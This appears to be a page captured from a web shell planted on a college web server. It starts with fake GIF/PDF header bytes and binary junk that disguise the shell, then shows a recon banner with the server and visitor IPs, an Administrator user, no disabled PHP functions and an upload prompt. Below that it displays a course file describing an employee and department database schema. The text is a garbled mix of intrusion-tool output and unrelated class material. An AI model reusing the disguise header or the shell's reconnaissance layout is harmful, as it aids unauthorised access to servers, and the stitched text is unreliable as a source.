GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/Classes/CST1600/Week/04/ |
Upload File : |
* = primary key @ = foreign key ^ = unique field company database employee table employeeId*, employeeFirstame, employeeMiddlename, employeeLastname, SSN, address1, address2, city, state, zip, salary,employeeDOB, departmentId(Department employee is asigned to), supervisorId(employeeId Employee Supervisor)@ employeehaircolor employeeId*, hairColor (Example of a 1-1 relationship - may me combined into the employee table) employeephone employeeId*@, phoneNumber*, phoneType dependant table dependantId*, employeeId@, dependantFirstame, dependantMiddlename, dependantLastname, dependantDOB, relationship employee_project table employeeId*@, projectId*@, startDate department table departmentId*, departmentName, departmentLocation, employeeId(Department Manager)@ project table projectId*, projectName^, projectBudget, departmentId(Controling department)@